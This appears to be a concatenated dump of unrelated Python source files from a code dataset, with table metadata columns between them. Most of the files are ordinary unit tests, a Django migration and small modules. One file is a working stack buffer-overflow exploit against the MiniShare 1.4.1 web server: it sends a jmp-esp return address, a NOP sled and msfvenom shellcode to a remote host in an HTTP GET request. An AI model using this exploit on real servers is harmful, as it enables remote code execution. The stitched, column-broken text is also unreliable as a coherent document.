mdb.MEDLEYDB_PATH, 'Audio', 'AHa_TakeOnMe',
'AHa_TakeOnMe_STEMS', "AHa_TakeOnMe_STEM_05.wav"),
os.path.join(resynth_path, "AHa_TakeOnMe_STEM_06_resynth.wav")
])
expected_mix_noguitar = sorted([
os.path.join(resynth_path, "AHa_TakeOnMe_STEM_01_resynth.wav"),
os.path.join(replace_path, "AHa_TakeOnMe_STEM_02_replace.wav"),
os.path.join(resynth_path, "AHa_TakeOnMe_STEM_03_resynth.wav"),
os.path.join(
mdb.MEDLEYDB_PATH, 'Audio', 'AHa_TakeOnMe',
'AHa_TakeOnMe_STEMS', "AHa_TakeOnMe_STEM_05.wav"),
os.path.join(resynth_path, "AHa_TakeOnMe_STEM_06_resynth.wav")
])
expected_mix_nosynth = sorted([
os.path.join(replace_path, "AHa_TakeOnMe_STEM_02_replace.wav"),
os.path.join(
mdb.MEDLEYDB_PATH, 'Audio', 'AHa_TakeOnMe',
'AHa_TakeOnMe_STEMS', "AHa_TakeOnMe_STEM_05.wav"),
])
self.assertEqual(expected_mix, sorted(actual_mix))
self.assertEqual(expected_mix_noguitar, sorted(actual_mix_noguitar))
self.assertEqual(expected_mix_nosynth, sorted(actual_mix_nosynth))
self.assertTrue(os.path.exists(mix_path))
os.remove(mix_path)
self.assertTrue(os.path.exists(mix_path_noguitar))
os.remove(mix_path_noguitar)
self.assertTrue(os.path.exists(mix_path_nosynth))
os.remove(mix_path_nosynth)
class TestCreateCompleteResynthMix(unittest.TestCase):
def test_one(self):
mtrack = mdb.MultiTrack("AHa_TakeOnMe")
resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
replace_path = os.path.join(
'/Users/rabitt/Dropbox',
'piano_guitar_resynth/vocalists_replace'
)
save_dir = 'data'
actual = CMD.create_complete_resynth_mix(
mtrack, resynth_path, replace_path, save_dir)
expected = {
"data/AHa_TakeOnMe_MIX_complete_resynth.wav": {
'multif0': "data/AHa_TakeOnMe_multif0_annotation.txt",
'guitar': "data/AHa_TakeOnMe_guitar_annotation.txt",
'piano': None,
'vocal': "data/AHa_TakeOnMe_vocal_annotation.txt",
'melody': "data/AHa_TakeOnMe_melody_annotation.txt",
'bass': None
},
"data/AHa_TakeOnMe_MIX_complete_noguitar.wav": {
'multif0': "data/AHa_TakeOnMe_multif0_noguitar_annotation.txt",
'guitar': None,
'piano': None,
'vocal': "data/AHa_TakeOnMe_vocal_annotation.txt",
'melody': "data/AHa_TakeOnMe_melody_annotation.txt",
'bass': None
},
"data/AHa_TakeOnMe_MIX_complete_nosynth.wav": {
'multif0': "data/AHa_TakeOnMe_multif0_nosynth_annotation.txt",
'guitar': None,
'piano': None,
'vocal': "data/AHa_TakeOnMe_vocal_annotation.txt",
'melody': "data/AHa_TakeOnMe_melody_annotation.txt",
'bass': None
}
}
self.assertEqual(
sorted(expected.keys()),
sorted(actual.keys())
)
files = []
for key in actual.keys():
self.assertEqual(
sorted(expected[key].keys()),
sorted(actual[key].keys()))
self.assertTrue(os.path.exists(key))
os.remove(key)
for subkey in actual[key].keys():
if actual[key][subkey] is not None:
self.assertEqual(
expected[key][subkey],
actual[key][subkey]
)
self.assertTrue(os.path.exists(actual[key][subkey]))
files.append(actual[key][subkey])
else:
self.assertEqual(expected[key][subkey], actual[key][subkey])
for fpath in list(set(files)):
os.remove(fpath)
class TestGetAnnotationMono(unittest.TestCase):
def test_empty_list(self):
mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
stem_idx = []
stem_list = [mtrack.stems[s] for s in stem_idx]
actual_times, actual_freqs = CMD.get_annotation_mono(mtrack, stem_list)
expected_times = []
expected_freqs = []
self.assertEqual(expected_times, actual_times)
self.assertEqual(expected_freqs, actual_freqs)
def test_nonempty_list_one(self):
mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
stem_idx = [4, 5]
stem_list = [mtrack.stems[s] for s in stem_idx]
actual_times, actual_freqs = CMD.get_annotation_mono(mtrack, stem_list)
expected_times = [0.39473922900000002]
expected_freqs = [193.88999999999999]
self.assertEqual(expected_times[0], actual_times[0])
self.assertEqual(expected_freqs[0], actual_freqs[0])
def test_nonempty_list_two(self):
mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
stem_idx = [3, 4, 5]
stem_list = [mtrack.stems[s] for s in stem_idx]
actual_times, actual_freqs = CMD.get_annotation_mono(mtrack, stem_list)
expected_times = None
expected_freqs = None
self.assertEqual(expected_times, actual_times)
self.assertEqual(expected_freqs, actual_freqs)
class TestGetFullmixAnnotation(unittest.TestCase):
def test_one(self):
mtrack = mdb.MultiTrack("AHa_TakeOnMe")
save_dir = 'data'
actual = CMD.get_fullmix_annotations(mtrack, save_dir)
expected = {mtrack.mix_path: {}}
self.assertEqual(expected, actual)
def test_two(self):
mtrack = mdb.MultiTrack("AcDc_BackInBlack")
save_dir = 'data'
actual = CMD.get_fullmix_annotations(mtrack, save_dir)
expected = {
mtrack.mix_path: {
'vocal': 'data/AcDc_BackInBlack_MIX_vocal.txt',
'bass': 'data/AcDc_BackInBlack_MIX_bass.txt'
}
}
self.assertEqual(
sorted(expected.keys()),
sorted(actual.keys())
)
files = []
for key in actual.keys():
self.assertEqual(
sorted(expected[key].keys()),
sorted(actual[key].keys()))
for subkey in actual[key].keys():
if actual[key][subkey] is not None:
self.assertEqual(
expected[key][subkey],
actual[key][subkey]
)
self.assertTrue(os.path.exists(actual[key][subkey]))
files.append(actual[key][subkey])
else:
self.assertEqual(expected[key][subkey], actual[key][subkey])
for fpath in list(set(files)):
os.remove(fpath)
def test_three(self):
mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
save_dir = 'data'
actual = CMD.get_fullmix_annotations(mtrack, save_dir)
expected = {
mtrack.mix_path: {
'vocal': None,
'bass': 'data/MusicDelta_BebopJazz_MIX_bass.txt',
'melody': 'data/MusicDelta_BebopJazz_MIX_melody.txt'
}
}
self.assertEqual(
sorted(expected.keys()),
sorted(actual.keys())
)
files = []
for key in actual.keys():
self.assertEqual(
sorted(expected[key].keys()),
sorted(actual[key].keys()))
for subkey in actual[key].keys():
if actual[key][subkey] is not None:
self.assertEqual(
expected[key][subkey],
actual[key][subkey]
)
self.assertTrue(os.path.exists(actual[key][subkey]))
files.append(actual[key][subkey])
else:
self.assertEqual(expected[key][subkey], actual[key][subkey])
for fpath in list(set(files)):
os.remove(fpath)
def test_four(self):
mtrack = mdb.MultiTrack("TablaBreakbeatScience_Animoog")
save_dir = 'data'
actual = CMD.get_fullmix_annotations(mtrack, save_dir)
expected = {
mtrack.mix_path: {
'vocal': None,
'bass': None,
'melody': None
}
}
self.assertEqual(
sorted(expected.keys()),
sorted(actual.keys())
)
files = []
for key in actual.keys():
self.assertEqual(
sorted(expected[key].keys()),
sorted(actual[key].keys()))
for subkey in actual[key].keys():
if actual[key][subkey] is not None:
self.assertEqual(
expected[key][subkey],
actual[key][subkey]
)
self.assertTrue(os.path.exists(actual[key][subkey]))
files.append(actual[key][subkey])
else:
self.assertEqual(expected[key][subkey], actual[key][subkey])
for fpath in list(set(files)):
os.remove(fpath)
class TestGetAllAudioAnnotPairs(unittest.TestCase):
def test_one(self):
mtrack = mdb.MultiTrack('AHa_TakeOnMe')
save_dir = 'data'
resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
replace_path = os.path.join(
'/Users/rabitt/Dropbox',
'piano_guitar_resynth/vocalists_replace'
)
actual = CMD.get_all_audio_annot_pairs(
mtrack, save_dir, resynth_path, replace_path)
expected = 'data/AHa_TakeOnMe_training_pairs.json'
self.assertEqual(expected, actual)
self.assertTrue(os.path.exists(actual))
| 37.833988
| 80
| 0.531455
| 4,010
| 38,515
| 4.871571
| 0.053865
| 0.072946
| 0.096545
| 0.055695
| 0.858971
| 0.826107
| 0.797082
| 0.771692
| 0.754441
| 0.728794
| 0
| 0.062587
| 0.344126
| 38,515
| 1,017
| 81
| 37.87119
| 0.71074
| 0
| 0
| 0.659783
| 0
| 0
| 0.178667
| 0.118272
| 0
| 0
| 0
| 0
| 0.118478
| 1
| 0.029348
| false
| 0
| 0.005435
| 0
| 0.048913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0bad58e42c8355e861c7612ae77aef4fd73ce954
| 37
|
py
|
Python
|
rekt_googleplaces/errors.py
|
vengefuldrx/rekt-googleplaces
|
7831ac262577ac47a1700c71b129841d695717fd
|
[
"Apache-2.0"
] | 1
|
2015-09-18T06:31:38.000Z
|
2015-09-18T06:31:38.000Z
|
rekt_googleplaces/errors.py
|
vengefuldrx/rekt-googleplaces
|
7831ac262577ac47a1700c71b129841d695717fd
|
[
"Apache-2.0"
] | null | null | null |
rekt_googleplaces/errors.py
|
vengefuldrx/rekt-googleplaces
|
7831ac262577ac47a1700c71b129841d695717fd
|
[
"Apache-2.0"
] | null | null | null |
from rekt_googlecore.errors import *
| 18.5
| 36
| 0.837838
| 5
| 37
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e7ffdc34a6d02c394ea6b443de8050d6818a5617
| 1,394
|
py
|
Python
|
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
mostwantedduck/osed-1
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | 28
|
2021-05-31T13:41:12.000Z
|
2022-03-29T06:19:18.000Z
|
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
sradley/osed
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | null | null | null |
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
sradley/osed
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | 15
|
2021-05-28T07:39:34.000Z
|
2022-03-09T19:09:28.000Z
|
#!/usr/bin/env python3
from pwn import *
pad = b'A' * 1787
# 0x74ff6c28: jmp esp;
ret = p32(0x75860000 + 0x6c28)
nop = b'\x90' * 64
# msfvenom -p windows/exec -b '\x00\x0d' -f py CMD=calc.exe
buf = b""
buf += b"\xba\x87\x2d\x18\x37\xda\xc2\xd9\x74\x24\xf4\x5f\x33"
buf += b"\xc9\xb1\x31\x31\x57\x13\x03\x57\x13\x83\xc7\x83\xcf"
buf += b"\xed\xcb\x63\x8d\x0e\x34\x73\xf2\x87\xd1\x42\x32\xf3"
buf += b"\x92\xf4\x82\x77\xf6\xf8\x69\xd5\xe3\x8b\x1c\xf2\x04"
buf += b"\x3c\xaa\x24\x2a\xbd\x87\x15\x2d\x3d\xda\x49\x8d\x7c"
buf += b"\x15\x9c\xcc\xb9\x48\x6d\x9c\x12\x06\xc0\x31\x17\x52"
buf += b"\xd9\xba\x6b\x72\x59\x5e\x3b\x75\x48\xf1\x30\x2c\x4a"
buf += b"\xf3\x95\x44\xc3\xeb\xfa\x61\x9d\x80\xc8\x1e\x1c\x41"
buf += b"\x01\xde\xb3\xac\xae\x2d\xcd\xe9\x08\xce\xb8\x03\x6b"
buf += b"\x73\xbb\xd7\x16\xaf\x4e\xcc\xb0\x24\xe8\x28\x41\xe8"
buf += b"\x6f\xba\x4d\x45\xfb\xe4\x51\x58\x28\x9f\x6d\xd1\xcf"
buf += b"\x70\xe4\xa1\xeb\x54\xad\x72\x95\xcd\x0b\xd4\xaa\x0e"
buf += b"\xf4\x89\x0e\x44\x18\xdd\x22\x07\x76\x20\xb0\x3d\x34"
buf += b"\x22\xca\x3d\x68\x4b\xfb\xb6\xe7\x0c\x04\x1d\x4c\xe2"
buf += b"\x4e\x3c\xe4\x6b\x17\xd4\xb5\xf1\xa8\x02\xf9\x0f\x2b"
buf += b"\xa7\x81\xeb\x33\xc2\x84\xb0\xf3\x3e\xf4\xa9\x91\x40"
buf += b"\xab\xca\xb3\x22\x2a\x59\x5f\x8b\xc9\xd9\xfa\xd3"
payload = pad + ret + nop + buf
r = remote('192.168.122.187', 80)
r.write(b'GET ' + payload + b' HTTP/1.1\r\n\r\n')
| 37.675676
| 62
| 0.663558
| 315
| 1,394
| 2.936508
| 0.609524
| 0.077838
| 0.015135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.249021
| 0.083931
| 1,394
| 36
| 63
| 38.722222
| 0.475333
| 0.071736
| 0
| 0
| 0
| 0.68
| 0.7134
| 0.681642
| 0
| 1
| 0.012393
| 0
| 0
| 1
| 0
| false
| 0
| 0.04
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f018590d4020a10258c68bbc49f4b6909f694428
| 8,861
|
py
|
Python
|
tests/tensortrade/unit/data/stream/test_node_builder_patterns.py
|
teonlacke/tensortrade
|
b1f441ff4a16940462720d96627f859e0497ab7d
|
[
"Apache-2.0"
] | 34
|
2020-06-05T22:39:53.000Z
|
2022-01-09T03:09:12.000Z
|
tests/tensortrade/unit/data/stream/test_node_builder_patterns.py
|
teonlacke/tensortrade
|
b1f441ff4a16940462720d96627f859e0497ab7d
|
[
"Apache-2.0"
] | 1
|
2022-01-17T06:38:27.000Z
|
2022-01-17T06:38:27.000Z
|
tests/tensortrade/unit/data/stream/test_node_builder_patterns.py
|
teonlacke/tensortrade
|
b1f441ff4a16940462720d96627f859e0497ab7d
|
[
"Apache-2.0"
] | 8
|
2020-06-01T12:09:53.000Z
|
2022-01-18T14:45:29.000Z
|
import pytest
import numpy as np
import pandas as pd
from tensortrade.data import DataFeed, Stream, BinOp
def test_lag():
s1 = Stream([1, 2, 3, 4, 5]).rename("stream")
assert s1.name == "stream"
lag = s1.lag()
assert lag.name == "Lag(stream,1)"
feed = DataFeed([lag])
feed.compile()
values = []
while feed.has_next():
values += [feed.next()["Lag(stream,1)"]]
assert values == [np.nan, 1, 2, 3, 4]
def test_apply():
s1 = Stream([1, 4, 9, 16, 25], "s1")
lag = s1.apply(np.sqrt).rename("apply")
feed = DataFeed([lag])
feed.compile()
values = []
while feed.has_next():
values += [feed.next()["apply"]]
assert values == [1, 2, 3, 4, 5]
def test_add():
s1 = Stream([1, 2, 3, 4, 5], "s1")
assert s1.name == "s1"
s2 = Stream([1, 2, 3, 4, 5], "s2")
assert s2.name == "s2"
s = s1 + s2
assert s.name == "Add(s1,s2)"
feed = DataFeed([s])
feed.compile()
values = []
while feed.has_next():
values += [feed.next()["Add(s1,s2)"]]
assert values == [2, 4, 6, 8, 10]
def test_sub():
s1 = Stream([2, 3, 4, 5, 6], "s1")
assert s1.name == "s1"
s2 = Stream([1, 2, 3, 4, 5], "s2")
assert s2.name == "s2"
s = s1 - s2
assert s.name == "Subtract(s1,s2)"
feed = DataFeed([s])
feed.compile()
values = []
while feed.has_next():
values += [feed.next()["Subtract(s1,s2)"]]
assert values == [1, 1, 1, 1, 1]
def test_truediv():
s1 = Stream([2, 3, 4, 5, 6], "s1")
s2 = Stream([2, 3, 4, 5, 6], "s2")
s = (s1 / s2).rename("div")
feed = DataFeed([s])
feed.compile()
values = []
while feed.has_next():
values += [feed.next()["div"]]
assert values == [1, 1, 1, 1, 1]
s1 = Stream([1, 1, 1, 1, 1], "s2")
s = (5 / s1).rename("div")
feed = DataFeed([s])
feed.compile()
values = []
while feed.has_next():
values += [feed.next()["div"]]
assert values == [5, 5, 5, 5, 5]
s1 = Stream([5, 5, 5, 5, 5], "s2")
s = (s1 / 5).rename("div")
feed = DataFeed([s])
feed.compile()
values = []
while feed.has_next():
values += [feed.next()["div"]]
assert values == [1, 1, 1, 1, 1]
def test_log_returns():
s1 = Stream([200.23, 198.35, 244.36, 266.30, 250.40], "price")
assert s1.name == "price"
lp = s1.log()
lr = lp - lp.lag()
feed = DataFeed([lr])
feed.compile()
while feed.has_next():
print(feed.next())
lr = s1.log().diff().rename("log_return")
feed = DataFeed([lr])
feed.compile()
while feed.has_next():
print(feed.next())
# pytest.fail("Failed.")
def test_ewma():
# adjust: True, ignore_na: True
v = [5, 2, 4, 6]
s = Stream(v, "s")
mean = s.ewm(alpha=0.68, adjust=True, ignore_na=True).mean().rename("mean")
feed = DataFeed([mean])
feed.compile()
expected = list(pd.Series(v).ewm(alpha=0.68, adjust=True, ignore_na=True).mean())
actual = []
while feed.has_next():
actual += [feed.next()["mean"]]
assert all(np.isclose(actual, expected))
# adjust: True, ignore_na: False
v = [5, 2, np.nan, 6]
s = Stream(v, "s")
mean = s.ewm(alpha=0.68, adjust=True, ignore_na=False).mean().rename("mean")
feed = DataFeed([mean])
feed.compile()
expected = list(pd.Series(v).ewm(alpha=0.68, adjust=True, ignore_na=False).mean())
actual = []
while feed.has_next():
actual += [feed.next()["mean"]]
assert all(np.isclose(actual, expected))
# adjust: True, ignore_na: False
v = [5, 2, np.nan, 6]
s = Stream(v, "s")
mean = s.ewm(alpha=0.68, adjust=False, ignore_na=True).mean().rename("mean")
feed = DataFeed([mean])
feed.compile()
expected = list(pd.Series(v).ewm(alpha=0.68, adjust=False, ignore_na=True).mean())
actual = []
while feed.has_next():
actual += [feed.next()["mean"]]
assert all(np.isclose(actual, expected))
# adjust: True, ignore_na: False
v = [5, 2, np.nan, 6]
s = Stream(v, "s")
mean = s.ewm(alpha=0.68, adjust=False, ignore_na=False).mean().rename("mean")
feed = DataFeed([mean])
feed.compile()
expected = list(pd.Series(v).ewm(alpha=0.68, adjust=False, ignore_na=False).mean())
actual = []
while feed.has_next():
actual += [feed.next()["mean"]]
assert all(np.isclose(actual, expected))
@pytest.mark.skip(reason="This is equal but says nans are not equal.")
def test_ewa_beginning_na():
# adjust: True, ignore_na: False
v = [np.nan, 2, np.nan, 6, 8, 5]
s = Stream(v).rename("s")
specs = [
{"alpha": 0.68, "adjust": True, "ignore_na": True, "min_periods": 3},
{"alpha": 0.68, "adjust": True, "ignore_na": False, "min_periods": 3},
{"alpha": 0.68, "adjust": False, "ignore_na": True, "min_periods": 3},
{"alpha": 0.68, "adjust": False, "ignore_na": False, "min_periods": 3}
]
for spec in specs:
d = spec.copy()
d["warmup"] = d["min_periods"]
del d["min_periods"]
mean = s.ewm(**d).mean().rename("mean")
feed = DataFeed([mean])
feed.compile()
expected = list(pd.Series(v).ewm(**spec).mean())
actual = []
while feed.has_next():
actual += [feed.next()["mean"]]
assert all(np.isclose(actual, expected))
@pytest.mark.skip(reason="Data module refactor will fix this.")
def test_ewmv_biased():
# bias: True
v = [np.nan, 2, np.nan, 6, 8, 5]
s = Stream(v).rename("s")
specs = [
{"alpha": 0.68, "adjust": True, "ignore_na": True, "min_periods": 3},
{"alpha": 0.68, "adjust": True, "ignore_na": False, "min_periods": 3},
{"alpha": 0.68, "adjust": False, "ignore_na": True, "min_periods": 3},
{"alpha": 0.68, "adjust": False, "ignore_na": False, "min_periods": 3}
]
for spec in specs:
d = spec.copy()
d["warmup"] = d["min_periods"]
del d["min_periods"]
var = s.ewm(**d).var(bias=True).rename("var")
feed = DataFeed([var])
feed.compile()
expected = list(pd.Series(v).ewm(**spec).var(bias=True))
actual = []
while feed.has_next():
actual += [feed.next()["var"]]
assert all(np.isclose(actual, expected))
@pytest.mark.skip(reason="This is equal but says nans are not equal.")
def test_emwmv_unbiased():
# bias: True
v = [np.nan, 2, np.nan, 6, 8, 5]
s = Stream(v, "s")
specs = [
{"alpha": 0.68, "adjust": True, "ignore_na": True, "min_periods": 3},
{"alpha": 0.68, "adjust": True, "ignore_na": False, "min_periods": 3},
{"alpha": 0.68, "adjust": False, "ignore_na": True, "min_periods": 3},
{"alpha": 0.68, "adjust": False, "ignore_na": False, "min_periods": 3}
]
for spec in specs:
d = spec.copy()
d["warmup"] = d["min_periods"]
del d["min_periods"]
var = s.ewm(**d).var(bias=False).rename("var")
feed = DataFeed([var])
feed.compile()
expected = list(pd.Series(v).ewm(**spec).var(bias=False))
actual = []
while feed.has_next():
actual += [feed.next()["var"]]
assert all(np.isclose(actual, expected))
def test_min():
s1 = Stream([1, 2, 3, 4], "s1")
s2 = Stream([1, 4, 3, 2], "s2")
m = s1.min(s2).rename("min")
feed = DataFeed([m])
feed.compile()
expected = [1, 2, 3, 2]
actual = []
while feed.has_next():
actual += [feed.next()["min"]]
assert actual == expected
def test_max():
s1 = Stream([1, 2, 3, 4], "s1")
s2 = Stream([1, 4, 3, 2], "s2")
m = s1.max(s2).rename("max")
feed = DataFeed([m])
feed.compile()
expected = [1, 4, 3, 4]
actual = []
while feed.has_next():
actual += [feed.next()["max"]]
assert actual == expected
def test_clamp_min():
s = Stream([1, -2, -3, 0, 5], "s")
m = s.clamp_min(0).rename("clamp_min")
feed = DataFeed([m])
feed.compile()
expected = [1, 0, 0, 0, 5]
actual = []
while feed.has_next():
actual += [feed.next()["clamp_min"]]
assert actual == expected
def test_clamp_max():
s = Stream([1, -2, -3, 0, 5], "s")
m = s.clamp_max(0).rename("clamp_max")
feed = DataFeed([m])
feed.compile()
expected = [0, -2, -3, 0, 0]
actual = []
while feed.has_next():
actual += [feed.next()["clamp_max"]]
assert actual == expected
def test_fillna():
s = Stream([1, np.nan, -3, np.nan, 5], "s")
m = s.fillna(-1).rename("fill")
feed = DataFeed([m])
feed.compile()
expected = [1, -1, -3, -1, 5]
actual = []
while feed.has_next():
actual += [feed.next()["fill"]]
assert actual == expected
| 22.097257
| 87
| 0.533348
| 1,271
| 8,861
| 3.645161
| 0.096774
| 0.043169
| 0.054392
| 0.072523
| 0.833801
| 0.824736
| 0.789337
| 0.761278
| 0.724153
| 0.690697
| 0
| 0.050528
| 0.26295
| 8,861
| 400
| 88
| 22.1525
| 0.658858
| 0.022345
| 0
| 0.662651
| 0
| 0
| 0.099734
| 0
| 0
| 0
| 0
| 0
| 0.11245
| 1
| 0.060241
| false
| 0
| 0.016064
| 0
| 0.076305
| 0.008032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f021db100ea9d617b6a8d4e32532f119448bde99
| 1,796
|
py
|
Python
|
correctiv_nursinghomes/migrations/0002_auto_20160523_1220.py
|
correctiv/correctiv-nursinghomes
|
c2037891ca650736cff82a675b0a08ae694a7b9c
|
[
"MIT"
] | 4
|
2016-09-24T07:27:44.000Z
|
2021-12-29T18:31:20.000Z
|
correctiv_nursinghomes/migrations/0002_auto_20160523_1220.py
|
correctiv/correctiv-nursinghomes
|
c2037891ca650736cff82a675b0a08ae694a7b9c
|
[
"MIT"
] | null | null | null |
correctiv_nursinghomes/migrations/0002_auto_20160523_1220.py
|
correctiv/correctiv-nursinghomes
|
c2037891ca650736cff82a675b0a08ae694a7b9c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-23 10:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('correctiv_nursinghomes', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='nursinghome',
name='care_day',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='nursinghome',
name='care_full',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='nursinghome',
name='care_night',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='nursinghome',
name='care_temp',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='nursinghome',
name='red_flag_decubitus',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='nursinghome',
name='red_flag_food',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='nursinghome',
name='red_flag_incontinence',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='nursinghome',
name='red_flag_medicine',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='nursinghome',
name='red_flag_pain',
field=models.BooleanField(default=False),
),
]
| 29.442623
| 53
| 0.569599
| 158
| 1,796
| 6.28481
| 0.322785
| 0.163142
| 0.208459
| 0.244713
| 0.749245
| 0.713998
| 0.713998
| 0.667674
| 0.667674
| 0.667674
| 0
| 0.016393
| 0.320713
| 1,796
| 60
| 54
| 29.933333
| 0.797541
| 0.037305
| 0
| 0.679245
| 1
| 0
| 0.145423
| 0.024913
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037736
| 0
| 0.09434
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f0263863d3f69202580656bdb00a74f6eb6f5d82
| 529
|
py
|
Python
|
app/controller/notificationController.py
|
kirei-open/redmine-api-grabber
|
2bd020c7bdc7b2abdb7839eb7eb5466de84a48e7
|
[
"MIT"
] | null | null | null |
app/controller/notificationController.py
|
kirei-open/redmine-api-grabber
|
2bd020c7bdc7b2abdb7839eb7eb5466de84a48e7
|
[
"MIT"
] | null | null | null |
app/controller/notificationController.py
|
kirei-open/redmine-api-grabber
|
2bd020c7bdc7b2abdb7839eb7eb5466de84a48e7
|
[
"MIT"
] | null | null | null |
from app.services import notification as notificationServices, redmine as redmineServices
def get_birthday():
return notificationServices.send_birthday_firebase()
def absen_masuk_notification():
return notificationServices.send_notif_absen_masuk()
def absen_keluar_notification():
return notificationServices.send_notif_absen_keluar()
def new_and_over_due_issues():
print('send notification')
data = redmineServices.get_all_project_detail()
return notificationServices.send_notif_per_device(data)
| 33.0625
| 89
| 0.818526
| 60
| 529
| 6.833333
| 0.516667
| 0.253659
| 0.292683
| 0.256098
| 0.253659
| 0.253659
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117202
| 529
| 16
| 90
| 33.0625
| 0.877944
| 0
| 0
| 0
| 0
| 0
| 0.032075
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.363636
| false
| 0
| 0.090909
| 0.272727
| 0.818182
| 0.090909
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
f05268cd6fca689312e1a472236403ddddce8e55
| 37
|
py
|
Python
|
Plugins/Pizza/__init__.py
|
olkab93/SkypeBot
|
2cd4f29b681045c5a1d26dc25551c3dc1d148401
|
[
"MIT"
] | null | null | null |
Plugins/Pizza/__init__.py
|
olkab93/SkypeBot
|
2cd4f29b681045c5a1d26dc25551c3dc1d148401
|
[
"MIT"
] | null | null | null |
Plugins/Pizza/__init__.py
|
olkab93/SkypeBot
|
2cd4f29b681045c5a1d26dc25551c3dc1d148401
|
[
"MIT"
] | null | null | null |
from .PizzaPlugin import PizzaPlugin
| 18.5
| 36
| 0.864865
| 4
| 37
| 8
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f072f8ae18fcb4910aa4bb9d542028193c0d785f
| 24
|
py
|
Python
|
third_party/ros_aarch64/lib/python2.7/dist-packages/pb_msgs/msg/__init__.py
|
silverland79/apollo1.0
|
6e725e8dd5013b769efa18f43e5ae675f4847fbd
|
[
"Apache-2.0"
] | 2
|
2018-01-29T03:10:39.000Z
|
2020-12-08T09:08:41.000Z
|
third_party/ros_aarch64/lib/python2.7/dist-packages/pb_msgs/msg/__init__.py
|
silverland79/apollo1.0
|
6e725e8dd5013b769efa18f43e5ae675f4847fbd
|
[
"Apache-2.0"
] | null | null | null |
third_party/ros_aarch64/lib/python2.7/dist-packages/pb_msgs/msg/__init__.py
|
silverland79/apollo1.0
|
6e725e8dd5013b769efa18f43e5ae675f4847fbd
|
[
"Apache-2.0"
] | 3
|
2018-01-29T12:22:56.000Z
|
2020-12-08T09:08:46.000Z
|
from .time_pb2 import *
| 12
| 23
| 0.75
| 4
| 24
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
